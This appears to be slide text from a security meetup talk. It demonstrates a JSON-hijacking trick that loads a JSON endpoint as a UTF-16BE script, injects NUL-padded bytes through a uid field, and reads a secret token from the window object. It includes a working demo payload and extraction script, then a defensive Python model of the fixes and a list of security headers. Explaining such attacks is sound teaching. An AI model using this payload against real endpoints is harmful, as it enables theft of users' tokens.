One Trick
and
One Treat

Renato Rodrigues  -  @SiMpS0N  -  //pathonproject.com
ØxOPOSɆC Mɇɇtuᵽ [0x6F] - The Meet

Trick

𝐔ni͓̽co̷d乇

Specify a charset on the script tag, so the browser decodes the response as UTF-16BE rather than the UTF-8 the server declares:

<script src="//JSON-ENDPOINT" charset="utf-16be"></script>

Content-Type: application/json; charset=utf-8

The weird case of JSON Hijack

while(1);[{token:"secret1",uid:"INJECTION"}]

Remember: UTF-8 (1-byte code units) | UTF-16 (2-byte code units) | UTF-32 (4-byte code units)

Goals:
  - Use a non-ASCII encoding so that the while(1); guard no longer parses as an infinite loop;
  - Have valid JavaScript.

The weird case of JSON Hijack

while(1) ... -> to Unicode code points (one ASCII byte each)
> `\u{77}\u{68}\u{69}\u{6c}\u{65}\u{28}\u{31}\u{29}`
  while(1)

Same bytes decoded as UTF-16BE (two bytes per code unit)
> `\u{7768}\u{696c}\u{6528}\u{3129}`
  "睨楬攨ㄩ" ...

Since the JSON endpoint had an injection point (the uid value), we inject the bytes that decode to "=1//" under UTF-16BE: the whole JSON prefix becomes one Unicode identifier, "=1" assigns to it, and "//" comments out the rest of the response:

unicode_identifier=1//

That assignment creates a global, so we can access the "window" object and read the last property set:

The JSON content is carried in the bytes of that property's name!

睨楬攨ㄩ .. %00=%001%00/%00/
Object.keys(self).pop()

DEMO

<script charset="utf-16be" src="http://demo.vwzq.net/php/secret.php?uid=%00=%001%00%2f%00%2f"></script> 
<script>alert(unescape(escape((Object.keys(window).pop())).replace(/%u(..)(..)/g,'%$1%$2')).substr(18,7))</script>

<pre>
> Object.keys(window).pop()
"睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢"

> escape("睨楬攨ㄩ㭛筴潫敮㨢獥捲整ㄢⱵ楤㨢")
"%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22"

> "%u7768%u696C%u6528%u3129%u3B5B%u7B74%u6F6B%u656E%u3A22%u7365%u6372%u6574%u3122%u2C75%u6964%u3A22".replace(/%u(..)(..)/g,'%$1%$2')
"%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22"

> unescape("%77%68%69%6C%65%28%31%29%3B%5B%7B%74%6F%6B%65%6E%3A%22%73%65%63%72%65%74%31%22%2C%75%69%64%3A%22")
"while(1);[{token:"secret1",uid:""
> 'while(1);[{token:"secret1",uid:"'.substr(18,7)
"secret1"
</pre>
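As an added example from the defender's side (not code from the talk or from demo.vwzq.net), the script below rebuilds the decoding step on a constructed copy of the demo response and shows the two fixes the slides point at: JSON-encoding the reflected value so no NUL byte reaches the wire, and X-Content-Type-Options: nosniff (from the classic-headers list) so a JSON response is never run as a script. The header model and MIME list are my simplification of the browser rule.

```python
import json

# Constructed stand-in for the demo endpoint: the while(1); guard followed
# by JSON in which the uid value is spliced into the body without escaping.
GUARD = b"while(1);"
INJECTED_UID = b"\x00=\x001\x00/\x00/"  # reads as "=1//" under UTF-16BE

def vulnerable_body(uid: bytes) -> bytes:
    """Reflects the raw uid bytes into the response (the flaw on the slides)."""
    return GUARD + b'[{token:"secret1",uid:"' + uid + b'"}]'

def hardened_body(uid: bytes) -> bytes:
    """Same endpoint, but the value goes through a real JSON encoder, which
    turns every NUL byte into the six ASCII characters \\u0000."""
    record = [{"token": "secret1", "uid": uid.decode("latin-1")}]
    return GUARD + json.dumps(record, separators=(",", ":")).encode("ascii")

def as_seen_by_script_tag(body: bytes) -> str:
    """What <script charset="utf-16be"> makes of the bytes: 2-byte units,
    a trailing odd byte becoming U+FFFD."""
    return body.decode("utf-16-be", errors="replace")

def is_assignment_to_identifier(text: str) -> bool:
    """True when the decoded text has the shape <identifier>=1//..., i.e. the
    JSON prefix runs as an assignment to a global named by its own bytes.
    str.isidentifier() uses Unicode identifier classes close to JavaScript's."""
    name, sep, _rest = text.partition("=1//")
    return bool(sep) and name.isidentifier()

# Subset of the JavaScript MIME types browsers accept for <script>.
JS_MIME_TYPES = {"text/javascript", "application/javascript",
                 "application/ecmascript", "text/ecmascript"}

def nosniff_blocks_script(headers: dict) -> bool:
    """Models the rule that X-Content-Type-Options: nosniff switches on: a
    response fetched for a <script> is executed only if its Content-Type is
    a JavaScript MIME type, so application/json is never run as script."""
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("x-content-type-options", "").strip().lower() != "nosniff":
        return False  # this model only decides the nosniff case
    mime = h.get("content-type", "").split(";")[0].strip().lower()
    return mime not in JS_MIME_TYPES

if __name__ == "__main__":
    leaked = as_seen_by_script_tag(vulnerable_body(INJECTED_UID))
    print("vulnerable:", is_assignment_to_identifier(leaked), leaked[:16])
    fixed = as_seen_by_script_tag(hardened_body(INJECTED_UID))
    print("hardened:", is_assignment_to_identifier(fixed))
```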

TREAT

Classic Sec. Headers

X-Xss-Protection

X-Frame-Options

X-Content-Type-Options

Strict-Transport-Security

Public-Key-Pins

Content-Security-Policy

"New" Sec. Headers

Referrer-Policy

The Referrer-Policy HTTP header governs which referrer information, sent in the Referer request header, is included with the requests a page makes.

Referrer-Policy: no-referrer
Referrer-Policy: no-referrer-when-downgrade
Referrer-Policy: origin
Referrer-Policy: origin-when-cross-origin
Referrer-Policy: same-origin
Referrer-Policy: strict-origin
Referrer-Policy: strict-origin-when-cross-origin
Referrer-Policy: unsafe-url

Feature-Policy

Feature Policy lets a site enable or disable certain browser features and APIs in the interest of better security and privacy. Directives are separated by semicolons:

Feature-Policy:
 accelerometer 'none';
 camera 'none';
 geolocation 'none';
 gyroscope 'none';
 microphone 'none';
 payment 'none';
 usb 'none';
 push 'self';
 ...

"New" Sec. Headers

Suborigins

Mechanism for programmatically defining origins to isolate different applications running in the same physical origin.

Clear Site Data (Clear-Site-Data)

Clears browsing data (cookies, storage, cache) associated with the requesting website.

The End!